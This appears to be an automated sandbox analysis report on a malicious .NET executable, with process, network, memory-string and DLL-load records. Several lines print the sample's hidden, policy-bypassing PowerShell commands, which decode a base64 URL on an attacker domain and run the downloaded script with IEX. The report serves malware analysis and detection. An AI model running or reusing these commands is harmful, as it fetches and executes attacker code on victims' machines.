Source: powershell.exe, 00000008.00000002.1312185487.0000000005A9A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1440209971.000001B762C05000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1440209971.000001B762AC2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1548093058.00000238C840F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1548093058.00000238C8552000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://nuget.org/nuget.exe
Source: 87J30ulb4q.exe, 00000000.00000002.1337853734.00000000027BE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1308266474.0000000004B86000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1399731267.000001B754110000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1481177567.00000238B9A5D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1481177567.00000238B99CD000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://zjhy.coimbratratadores.com
Source: 87J30ulb4q.exe, 00000000.00000002.1337853734.00000000027BE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://zjhy.coimbratratadores.com/gyofchhr/?l=y4CMuADfvJHUgATMgM3dvRmbpdFI0Z2bz9mcjlWT8JXZk5WZmVGRg
Source: 87J30ulb4q.exe, 00000000.00000002.1337853734.00000000027F5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1308266474.0000000004B86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://zjhy.coimbratratadores.com/jkqjcpxpnhtgxr
Source: powershell.exe, 0000000C.00000002.1481177567.00000238B99CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://zjhy.coimbratratadores.com/ukbhsxzcjwqypk
Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.11:49707 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.11:49708 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.11:49740 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.11:49788 version: TLS 1.2

System Summary

Source: Process Memory Space: powershell.exe PID: 7224, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 7452, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 7684, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: C:\Users\user\Desktop\87J30ulb4q.exe | Code function: 0_2_00A54C78
Source: C:\Users\user\Desktop\87J30ulb4q.exe | Code function: 0_2_00A55548
Source: C:\Users\user\Desktop\87J30ulb4q.exe | Code function: 0_2_00A54930
Source: C:\Users\user\Desktop\87J30ulb4q.exe | Code function: 0_2_00A55D35
Source: 87J30ulb4q.exe, 00000000.00000002.1336329887.0000000000B3E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs 87J30ulb4q.exe
Source: 87J30ulb4q.exe, 00000000.00000000.1266829570.0000000000438000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameCavnDkCvt.exe4 vs 87J30ulb4q.exe
Source: 87J30ulb4q.exe | Binary or memory string: OriginalFilenameCavnDkCvt.exe4 vs 87J30ulb4q.exe
Source: Process Memory Space: powershell.exe PID: 7224, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 7452, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 7684, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engine | Classification label: mal100.evad.winEXE@8/12@1/1
Source: C:\Users\user\Desktop\87J30ulb4q.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\87J30ulb4q.exe.log
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7692:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7464:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6532:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fxwdlem1.d0c.ps1
Source: 87J30ulb4q.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 87J30ulb4q.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\87J30ulb4q.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: 87J30ulb4q.exe | ReversingLabs: Detection: 52%
Source: 87J30ulb4q.exe | Virustotal: Detection: 63%
Source: unknown | Process created: C:\Users\user\Desktop\87J30ulb4q.exe "C:\Users\user\Desktop\87J30ulb4q.exe"
Source: C:\Users\user\Desktop\87J30ulb4q.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\87J30ulb4q.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -w hid -noni -ep Bypass -c "$w=New-Object Net.WebClient;$u=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aHR0cHM6Ly96amh5LmNvaW1icmF0cmF0YWRvcmVzLmNvbS9qa3FqY3B4cG5odGd4cg=='));IEX $w.DownloadString($u)"
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -w hid -noni -ep Bypass -c "$w=New-Object Net.WebClient;$u=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aHR0cHM6Ly96amh5LmNvaW1icmF0cmF0YWRvcmVzLmNvbS91a2Joc3h6Y2p3cXlwaw=='));IEX $w.DownloadString($u)"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -w hid -noni -ep Bypass -c "$w=New-Object Net.WebClient;$u=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aHR0cHM6Ly96amh5LmNvaW1icmF0cmF0YWRvcmVzLmNvbS91a2Joc3h6Y2p3cXlwaw=='));IEX $w.DownloadString($u)"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\87J30ulb4q.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -w hid -noni -ep Bypass -c "$w=New-Object Net.WebClient;$u=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aHR0cHM6Ly96amh5LmNvaW1icmF0cmF0YWRvcmVzLmNvbS9qa3FqY3B4cG5odGd4cg=='));IEX $w.DownloadString($u)"
Source: C:\Users\user\Desktop\87J30ulb4q.exe | Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\87J30ulb4q.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\87J30ulb4q.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\87J30ulb4q.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\87J30ulb4q.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\87J30ulb4q.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\87J30ulb4q.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\87J30ulb4q.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\87J30ulb4q.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\87J30ulb4q.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\87J30ulb4q.exe | Section loaded: wbemcomn.dll
Source: C:\Users\user\Desktop\87J30ulb4q.exe | Section loaded: amsi.dll
Source: C:\Users\user\Desktop\87J30ulb4q.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\87J30ulb4q.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\87J30ulb4q.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\87J30ulb4q.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\87J30ulb4q.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\87J30ulb4q.exe | Section loaded: rasapi32.dll
Source: C:\Users\user\Desktop\87J30ulb4q.exe | Section loaded: rasman.dll
Source: C:\Users\user\Desktop\87J30ulb4q.exe | Section loaded: rtutils.dll
Source: C:\Users\user\Desktop\87J30ulb4q.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\87J30ulb4q.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\87J30ulb4q.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\87J30ulb4q.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\87J30ulb4q.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\Desktop\87J30ulb4q.exe | Section loaded: dhcpcsvc.dll
Source: C:\Users\user\Desktop\87J30ulb4q.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\87J30ulb4q.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\87J30ulb4q.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\87J30ulb4q.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\87J30ulb4q.exe | Section loaded: secur32.dll
Source: C:\Users\user\Desktop\87J30ulb4q.exe | Section loaded: schannel.dll
Source: C:\Users\user\Desktop\87J30ulb4q.exe | Section loaded: mskeyprotect.dll
Source: C:\Users\user\Desktop\87J30ulb4q.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\87J30ulb4q.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\87J30ulb4q.exe | Section loaded: ncryptsslp.dll
Source: C:\Users\user\Desktop\87J30ulb4q.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\87J30ulb4q.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasapi32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasman.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rtutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: schannel.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mskeyprotect.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: linkinfo.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntshrui.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cscapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: policymanager.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: taskflowdataengine.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cdp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: umpdc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dsreg.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: linkinfo.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntshrui.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cscapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: policymanager.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntmarta.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: taskflowdataengine.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cdp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: umpdc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dsreg.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\87J30ulb4q.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: 87J30ulb4q.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: 87J30ulb4q.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: 87J30ulb4q.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: e.pdb source: powershell.exe, 0000000C.00000002.1558187413.00000238D0609000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.pdb source: powershell.exe, 00000009.00000002.1455748660.000001B76ACD5000.00000004.00000020.00020000.00000000.sdmp
